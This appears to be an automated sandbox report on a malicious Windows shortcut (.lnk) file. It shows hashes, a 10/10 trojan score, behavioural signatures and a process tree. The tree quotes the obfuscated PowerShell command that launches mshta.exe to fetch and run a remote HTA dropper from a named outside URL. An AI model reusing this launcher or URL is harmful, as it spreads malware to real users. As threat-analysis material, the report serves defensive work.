Overview

overview

10

Static

static

1

3ffc211ce7...fb.lnk

windows7-x64

3

3ffc211ce7...fb.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/06/2024, 01:13

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    3ffc211ce78796544ad9ad8726a59b981d7cec288eb17ff51e2e74bbf1d93dfb.lnk

  • Size

    59KB

  • MD5

    a93cb039d8b98e77656b11af495edd09

  • SHA1

    0c881101dcca67b960e51c3c42bb547a342731bd

  • SHA256

    3ffc211ce78796544ad9ad8726a59b981d7cec288eb17ff51e2e74bbf1d93dfb

  • SHA512

    f038ececae42f3f726e9d70db3d53986d6ad3d7806d9da8102938e22e87916349672f93e07a2797629bb595954d6e6a447bfc924bfb00cd4e269006240ba0f96

  • SSDEEP

    12:8MFm/3BVSXvk44X3ojsqzKtnWNUfW+UcCsvX1CKeXRpKWKDiN33YlNPeVnI:8l/BHYVKVWKe+/CWFC7hpgaHKPeFI

Score
10/10
evasiontrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://uits-bd.com/images/Quote6.hta

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 33 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\3ffc211ce78796544ad9ad8726a59b981d7cec288eb17ff51e2e74bbf1d93dfb.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'https://uits-bd.com/images/Quote6.hta'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4588
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" https://uits-bd.com/images/Quote6.hta
        3⤵
        • Blocklisted process makes network request
        • Checks whether UAC is enabled
        PID:1692
  • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
    "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
    1⤵
      PID:3716
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4468
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4468 CREDAT:17410 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:544
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4468 CREDAT:82946 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2584

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
            Filesize

            717B

            MD5

            822467b728b7a66b081c91795373789a

            SHA1

            d8f2f02e1eef62485a9feffd59ce837511749865

            SHA256

            af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

            SHA512

            bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
            Filesize

            471B

            MD5

            c6440d653995acea2a63cd83b7c4d444

            SHA1

            5c5b83061ac0f31ff83d3a472fd77899c3bab3f0

            SHA256

            73e12cf5c60f5dc8dc6ad13d2d8581e5dfbbfdbd3848caa564745c19bc584d37

            SHA512

            d79dc9496f78dc4eb8d0376bcdca421ed8b8fb8653f654d7d3ae84afa05bbc9571589413677a4d989a04558d3bb2381ffcdabb639ce231ccd7e0cd558696d75b

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8F008D6624224CC0A7F3ED1A45C7E2D5
            Filesize

            503B

            MD5

            b6361ee8953c128d7a62117aa94daa4a

            SHA1

            716fe5c553062a65c9c67241c8390fa6d2af0943

            SHA256

            0f376ed86848446fa6269d265b56afff9257e902f4d64cfd2dd4dbbb1cdf8211

            SHA512

            844bcd8363833e4ad34d354dd8a1f564778fd6c8fa311415acd5d40d905e1202b21808f51a4677b303ee0730365bc3d386652211adec7071f227211bbba7e618

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
            Filesize

            192B

            MD5

            823356a74c0142658f8bfadd642b74ad

            SHA1

            1fc30c9480ec352d54956b5c6b5cc09a13cc025e

            SHA256

            62dfa90352c2f22053e987ec89ec00280230929aec9e922bd3cbcbc2152405e6

            SHA512

            e935b5e5060038fd99b02d3fdb5367c1453e73b348a2bdb2d53e0182a57714371dcbe765a8699336169d7da8309eb1236435085131963e4427c3b88870f463c7

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
            Filesize

            404B

            MD5

            1dfa38479934e07e9636ecce2b978b56

            SHA1

            6391de1653356747563c75d537b30f693362bce4

            SHA256

            4210d02c7b998ab77ab96238fe29ae3c9741a656d43c4e9e219acde3dc2e726b

            SHA512

            b74cab9d0d3215db5634f60a8361ca2f9e68eb4a59099843dc1042f3b058432667ce002303fd0580eef01b9c36bac0d2995620a1af29deb6665795e3430c36ce

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8F008D6624224CC0A7F3ED1A45C7E2D5
            Filesize

            552B

            MD5

            10c83b5a3238f3630c5541e8c3ef9fff

            SHA1

            6287f70e0bea5b4025a619c7d4968adb32550f54

            SHA256

            c866cd7dfb37472dbfc894ed2d288e6643a8af1fa04d3124803c2a8786a79eb1

            SHA512

            87015fd5d0279abeb20c31e25e2e2ce0489c37fe5c4d54f46c6f2612308a9e4665ad669b87c35fb2daa2f6f911d26d905d42718b7ac5a09be5493aa7385c391c

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\AKI8W8FH\suggestions[1].en-US
            Filesize

            17KB

            MD5

            5a34cb996293fde2cb7a4ac89587393a

            SHA1

            3c96c993500690d1a77873cd62bc639b3a10653f

            SHA256

            c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

            SHA512

            e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j4ekqeo4.mh0.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • memory/4588-17-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4588-14-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4588-13-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4588-2-0x00007FFCA8C23000-0x00007FFCA8C25000-memory.dmp

            Filesize

            8KB

            Download

          • memory/4588-8-0x000002BD76BA0000-0x000002BD76BC2000-memory.dmp

            Filesize

            136KB

            Download